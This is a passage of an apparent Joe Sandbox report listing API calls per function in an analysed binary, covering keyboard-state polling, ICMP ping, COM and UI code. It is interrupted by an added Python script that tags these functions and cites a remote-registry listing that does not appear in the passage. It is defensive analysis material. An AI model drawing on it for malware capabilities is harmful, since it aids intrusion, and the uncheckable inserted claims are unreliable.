                • Instruction ID: c3ba81f925ef9167d5693929e12257c3d5b56b1423f14b8946aac90afea0423b
                • Opcode Fuzzy Hash: 25be4627a0f1724b0e83466090f397e2dd0d4bb636142495185efe2a5e10c554
                • Instruction Fuzzy Hash: F8C135716083059FCB04DF68C88496BB7E9FF89744F00491DF99A9B250DB30EE46CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitialize.OLE32(00000000), ref: 00187AF3
                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00187B8F
                • SHGetDesktopFolder.SHELL32(?), ref: 00187BA3
                • CoCreateInstance.OLE32(001AFD08,00000000,00000001,001D6E6C,?), ref: 00187BEF
                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00187C74
                • CoTaskMemFree.OLE32(?,?), ref: 00187CCC
                • SHBrowseForFolderW.SHELL32(?), ref: 00187D57
                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00187D7A
                • CoTaskMemFree.OLE32(00000000), ref: 00187D81
                • CoTaskMemFree.OLE32(00000000), ref: 00187DD6
                • CoUninitialize.OLE32 ref: 00187DDC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                • String ID:
                • API String ID: 2762341140-0
                • Opcode ID: ce61db49140b09527500c38a496bb1cde1c50d02c745c956dbd1c8acb05892df
                • Instruction ID: 3b5e7bd8556f3de938759cc8226a80182ef1a2c0f19ea73b53bba5dd5a158230
                • Opcode Fuzzy Hash: ce61db49140b09527500c38a496bb1cde1c50d02c745c956dbd1c8acb05892df
                • Instruction Fuzzy Hash: C6C10B75A04109AFCB14DFA4C884DAEBBF9FF48314B1485A9E8199B761D730EE85CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001A5504
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A5515
                • CharNextW.USER32(00000158), ref: 001A5544
                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001A5585
                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001A559B
                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001A55AC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                • Opcode ID: fa9ad2a0c825cff328f67718347f7429b98839bf0185213cbd9e34d967a7bc50
                • Instruction ID: 0ec1fb882d231fd604150fa08ab999493920b7f1329d0a3b802921bdd6d9ffcb
                • Opcode Fuzzy Hash: fa9ad2a0c825cff328f67718347f7429b98839bf0185213cbd9e34d967a7bc50
                • Instruction Fuzzy Hash: 5D616E79908608EBDF10DF94DC849FE7BBAEB0B724F104145F925AB291D7748A80DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0016FAAF
                • SafeArrayAllocData.OLEAUT32(?), ref: 0016FB08
                • VariantInit.OLEAUT32(?), ref: 0016FB1A
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0016FB3A
                • VariantCopy.OLEAUT32(?,?), ref: 0016FB8D
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0016FBA1
                • VariantClear.OLEAUT32(?), ref: 0016FBB6
                • SafeArrayDestroyData.OLEAUT32(?), ref: 0016FBC3
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0016FBCC
                • VariantClear.OLEAUT32(?), ref: 0016FBDE
                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0016FBE9
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: a118c73d7b3dcfbc47924cec918b141c35e569e570d010294f06859242888c85
                • Instruction ID: aab7eb2f45bb5410bb509081f2735985a5412f97f7dc44db4780e2b1916e15c4
                • Opcode Fuzzy Hash: a118c73d7b3dcfbc47924cec918b141c35e569e570d010294f06859242888c85
                • Instruction Fuzzy Hash: 3F416235A00219DFCB04DF68DC549EEBBB9FF19344F008069E905A7261CB30E956CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetKeyboardState.USER32(?), ref: 00179CA1
                • GetAsyncKeyState.USER32(000000A0), ref: 00179D22
                • GetKeyState.USER32(000000A0), ref: 00179D3D
                • GetAsyncKeyState.USER32(000000A1), ref: 00179D57
                • GetKeyState.USER32(000000A1), ref: 00179D6C
                • GetAsyncKeyState.USER32(00000011), ref: 00179D84
                • GetKeyState.USER32(00000011), ref: 00179D96
                • GetAsyncKeyState.USER32(00000012), ref: 00179DAE
                • GetKeyState.USER32(00000012), ref: 00179DC0
                • GetAsyncKeyState.USER32(0000005B), ref: 00179DD8
                • GetKeyState.USER32(0000005B), ref: 00179DEA
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: 2008bd6b1ad031f09e5634a7ab1cd4a72f6ee6f2f38db16622d8dc59229ba820
                • Instruction ID: 3f289a1ebfee20009c450cc5f4d865a7cae356f9e1923328544d526078bc6c67
                • Opcode Fuzzy Hash: 2008bd6b1ad031f09e5634a7ab1cd4a72f6ee6f2f38db16622d8dc59229ba820
                • Instruction Fuzzy Hash: 224189345047CA6DFF3596A4C4043B5BEB16F12344F48C05ADACE566C2EBA599CCC792
                Uniqueness

                Uniqueness Score: -1.00%
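The listings above are Joe Sandbox per-function API summaries for what the report itself identifies as an AutoIt-compiled binary. Each line has the shape `Name.MODULE(args), ref: address`, with `?` standing for arguments the sandbox could not resolve. Two of them are worth triaging mechanically rather than by eye: the function that polls GetAsyncKeyState/GetKeyState for 0xA0, 0xA1, 0x11, 0x12 and 0x5B (the Win32 virtual-key codes for left Shift, right Shift, Control, Alt and the left Windows key, so a modifier-key check rather than a full keystroke logger), and the one that maps `\IPC$` with WNetAddConnection2W, connects to a remote HKEY_LOCAL_MACHINE (0x80000002) with RegConnectRegistryW and resolves a CLSID under `SOFTWARE\Classes\` (the registry lookup behind creating a COM object on another host). The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin output: it parses this line format, decodes the virtual-key and hive constants, and tags a function by the API set it calls. The sample input is copied from the two listings just mentioned; the tag names and the VK/hive tables are this example's own, and the inclusion of CoGetObject as a trigger reflects that it is the API through which display-name monikers, including COM elevation monikers, are bound.

```python
import re
from typing import Dict, List, Optional

# One Joe Sandbox "APIs" line: optional bullet, optional "Part of subcall function X:",
# then Name.MODULE, optional (args), then "ref: ADDR". Added example, not report output.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Virtual-key codes seen as GetAsyncKeyState/GetKeyState arguments (winuser.h values).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
# Predefined registry hive handles (2nd argument of RegConnectRegistryW).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# Tag -> APIs whose presence in one function earns the tag. Labels are this example's own.
TAGS = {
    "key-state-polling": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
    "remote-registry": {"RegConnectRegistryW", "WNetAddConnection2W"},
    "com-moniker-bind": {"CoGetObject"},  # binds display-name monikers, incl. Elevation:Administrator!new:
    "icmp-probe": {"IcmpCreateFile", "IcmpSendEcho"},
}

def parse_api_line(line: str) -> Optional[Dict]:
    """Parse one API line into name/module/args/ref/subcall, or None if it is not one."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    return {
        "name": m.group("name"),
        "module": m.group("module"),
        "args": [a.strip() for a in raw.split(",")] if raw else [],
        "ref": int(m.group("ref"), 16),
        "subcall": m.group("sub") is not None,  # made inside a callee, not by this function
    }

def parse_block(text: str) -> List[Dict]:
    """All API lines of one function listing; headers, hashes and blank lines are skipped."""
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]

def arg_int(arg: str) -> Optional[int]:
    """Hex argument to int; '?' (unresolved by the sandbox) and string literals give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def polled_keys(calls: List[Dict]) -> List[str]:
    """Distinct virtual keys a function polls with GetAsyncKeyState/GetKeyState, in call order."""
    names: List[str] = []
    for c in calls:
        if c["name"] in ("GetAsyncKeyState", "GetKeyState") and c["args"]:
            vk = arg_int(c["args"][0])
            if vk is None:
                continue
            label = VK_NAMES.get(vk, f"VK_{vk:02X}")
            if label not in names:
                names.append(label)
    return names

def connected_hive(calls: List[Dict]) -> Optional[str]:
    """Hive handed to RegConnectRegistryW, named if predefined, otherwise as hex."""
    for c in calls:
        if c["name"] == "RegConnectRegistryW" and len(c["args"]) >= 2:
            h = arg_int(c["args"][1])
            return None if h is None else HIVES.get(h, f"0x{h:08X}")
    return None

def tag_function(calls: List[Dict]) -> List[str]:
    """Sorted tags for the APIs the function itself calls (subcall lines are excluded)."""
    present = {c["name"] for c in calls if not c["subcall"]}
    return sorted(tag for tag, apis in TAGS.items() if present & apis)

# Constructed sample input: copied from the two report listings named in the lead-in.
SAMPLE_KEYS = r"""
• GetKeyboardState.USER32(?), ref: 00179CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00179D22
• GetKeyState.USER32(000000A0), ref: 00179D3D
• GetAsyncKeyState.USER32(000000A1), ref: 00179D57
• GetAsyncKeyState.USER32(00000011), ref: 00179D84
• GetAsyncKeyState.USER32(00000012), ref: 00179DAE
• GetAsyncKeyState.USER32(0000005B), ref: 00179DD8
"""
SAMPLE_REMOTE_REG = r"""
  • Part of subcall function 00116B57: _wcslen.LIBCMT ref: 00116B6A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001707A2
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001707BE
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001707DA
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0017082C
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00170837
"""

if __name__ == "__main__":
    for label, block in (("keyboard check", SAMPLE_KEYS), ("remote CLSID lookup", SAMPLE_REMOTE_REG)):
        calls = parse_block(block)
        print(label, tag_function(calls), polled_keys(calls), connected_hive(calls))
```

Subcall lines are parsed but excluded from tagging on purpose: the report attributes them to a callee, so counting them would tag every caller of a shared helper such as `_wcslen`. To extend the triage to the rest of the listings, paste each function's APIs section into `parse_block` and add trigger sets to `TAGS` for the API groups you care about.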

                APIs
                • WSAStartup.WSOCK32(00000101,?), ref: 001905BC
                • inet_addr.WSOCK32(?), ref: 0019061C
                • gethostbyname.WSOCK32(?), ref: 00190628
                • IcmpCreateFile.IPHLPAPI ref: 00190636
                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001906C6
                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001906E5
                • IcmpCloseHandle.IPHLPAPI(?), ref: 001907B9
                • WSACleanup.WSOCK32 ref: 001907BF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                • String ID: Ping
                • API String ID: 1028309954-2246546115
                • Opcode ID: a7a0de72958c6ee876f8466a4faeb8b54e8d46e87ec2d8ca3c9c70032d8ff701
                • Instruction ID: b5bf08510366301e73b0f5795a473c53def0af2cdc93af150ed1d01c0d983a34
                • Opcode Fuzzy Hash: a7a0de72958c6ee876f8466a4faeb8b54e8d46e87ec2d8ca3c9c70032d8ff701
                • Instruction Fuzzy Hash: 85919E356042019FDB25CF55D888F1ABBE0AF48328F1585A9F4A98B6A2C730FD85CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharLower
                • String ID: cdecl$none$stdcall$winapi
                • API String ID: 707087890-567219261
                • Opcode ID: 1125af3ba84fcb57f6eb32a4000786138d207814948eaada18722300cb055f0c
                • Instruction ID: f0d10c33534a6235e2cc763984c92f381ce742ffb90a1b1c559539d02eb4b561
                • Opcode Fuzzy Hash: 1125af3ba84fcb57f6eb32a4000786138d207814948eaada18722300cb055f0c
                • Instruction Fuzzy Hash: 3D518F31A001169BCF14DFACC9609BEB7E5BF66724B614229E826E72C4EB35DD40C790
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CoInitialize.OLE32 ref: 00193774
                • CoUninitialize.OLE32 ref: 0019377F
                • CoCreateInstance.OLE32(?,00000000,00000017,001AFB78,?), ref: 001937D9
                • IIDFromString.OLE32(?,?), ref: 0019384C
                • VariantInit.OLEAUT32(?), ref: 001938E4
                • VariantClear.OLEAUT32(?), ref: 00193936
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                • API String ID: 636576611-1287834457
                • Opcode ID: 59756aa284fec563001c68581f17a30a824606660e2e835cdd1f43e8ca5c2c7b
                • Instruction ID: 3c7c5cbc8d88d3fc7ec82f5ff2230a11542add84899f70119a0847e5402bb82e
                • Opcode Fuzzy Hash: 59756aa284fec563001c68581f17a30a824606660e2e835cdd1f43e8ca5c2c7b
                • Instruction Fuzzy Hash: 2E61C070608311AFD715DF54C888F6ABBE8EF49714F00091DF9A59B291D770EE89CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001833CF
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001833F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LoadString$_wcslen
                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                • API String ID: 4099089115-3080491070
                • Opcode ID: 53b82d3796c8956e4556425d1818dc1d282ffbb3297f8f1de58a36a716f31f13
                • Instruction ID: ef22506665831ac35ec8ea795cea7d58a3ced3d3a258314a14eca6fcb3727460
                • Opcode Fuzzy Hash: 53b82d3796c8956e4556425d1818dc1d282ffbb3297f8f1de58a36a716f31f13
                • Instruction Fuzzy Hash: 27518D71900209BADF19EBE0DD42EEEB778AF24740F144066F51572192EB312F98DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: APPEND$EXISTS$KEYS$REMOVE
                • API String ID: 1256254125-769500911
                • Opcode ID: 3a6aa0312fced72721cadb8fce5c8bfc37f023551661b8a3795a8d1bb48cce96
                • Instruction ID: 3d30b254e5f38f8bfc7a1165333824589b8fa7d931f9360ea207dc37bd0be096
                • Opcode Fuzzy Hash: 3a6aa0312fced72721cadb8fce5c8bfc37f023551661b8a3795a8d1bb48cce96
                • Instruction Fuzzy Hash: B6412932A080269BCB106F7DC8D06BE77B1AF64764B248129F629DB284E735CD81C390
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 001853A0
                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00185416
                • GetLastError.KERNEL32 ref: 00185420
                • SetErrorMode.KERNEL32(00000000,READY), ref: 001854A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Error$Mode$DiskFreeLastSpace
                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                • API String ID: 4194297153-14809454
                • Opcode ID: 9f7a0eb2a904b1140f4b1f41c9f6d257b438a6bf03d5794c4cb801bb3085ee64
                • Instruction ID: 569dbdea0695c4d49e5060becbf136e7f11c6a6fe14d9bf50b0dfa42ca687463
                • Opcode Fuzzy Hash: 9f7a0eb2a904b1140f4b1f41c9f6d257b438a6bf03d5794c4cb801bb3085ee64
                • Instruction Fuzzy Hash: B7318F35A00604DFD714EF68C584AAA7BB6EF55305F148066E405DB392EB71EE86CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateMenu.USER32 ref: 001A3C79
                • SetMenu.USER32(?,00000000), ref: 001A3C88
                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A3D10
                • IsMenu.USER32(?), ref: 001A3D24
                • CreatePopupMenu.USER32 ref: 001A3D2E
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001A3D5B
                • DrawMenuBar.USER32 ref: 001A3D63
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0$F
                • API String ID: 161812096-3044882817
                • Opcode ID: 9b38f66fc07ffbfd49141295c519971cb510d4688b2cb44ae7a0eae75481e3ee
                • Instruction ID: 7cbe77a66e88797e34e5fe49658de23b5f9813c78f6b01619d1f5a11875ccda4
                • Opcode Fuzzy Hash: 9b38f66fc07ffbfd49141295c519971cb510d4688b2cb44ae7a0eae75481e3ee
                • Instruction Fuzzy Hash: F2414779A01209EFDB14CFA4E884BEA7BB5FF4A354F140029F956A7360D770AA50CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 00119CB3: _wcslen.LIBCMT ref: 00119CBD
                  • Part of subcall function 00173CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00173CCA
                • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00171F64
                • GetDlgCtrlID.USER32 ref: 00171F6F
                • GetParent.USER32 ref: 00171F8B
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00171F8E
                • GetDlgCtrlID.USER32(?), ref: 00171F97
                • GetParent.USER32(?), ref: 00171FAB
                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00171FAE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$CtrlParent$ClassName_wcslen
                • String ID: ComboBox$ListBox
                • API String ID: 711023334-1403004172
                • Opcode ID: 6dbc848a4c5d0c0403bd1d04916ba6f4b52651dd50cb87a431fafc09b118a49f
                • Instruction ID: 8f099d3cceae73f6882f900c25497fc3c858a93180c0f3909a4d33a5a24f67f1
                • Opcode Fuzzy Hash: 6dbc848a4c5d0c0403bd1d04916ba6f4b52651dd50cb87a431fafc09b118a49f
                • Instruction Fuzzy Hash: E721CF70900218BBCF05EFA4DC95EEEBBB9EF16350B104116F969A72A1CB345948DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001A3A9D
                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001A3AA0
                • GetWindowLongW.USER32(?,000000F0), ref: 001A3AC7
                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001A3AEA
                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001A3B62
                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001A3BAC
                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001A3BC7
                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001A3BE2
                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001A3BF6
                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001A3C13
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSend$LongWindow
                • String ID:
                • API String ID: 312131281-0
                • Opcode ID: ae62d21020124b6a57641f7da715c96661deb1c6491cef733faab737793923b2
                • Instruction ID: dae47c8eeb0e75531b3ceec866bdee7a6b85855b0dfd9b8e826eedf35dc18a81
                • Opcode Fuzzy Hash: ae62d21020124b6a57641f7da715c96661deb1c6491cef733faab737793923b2
                • Instruction Fuzzy Hash: A5615C75900248AFDB10DFA4CC81FEE77B8EB0A714F10415AFA15AB291D770AA85DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
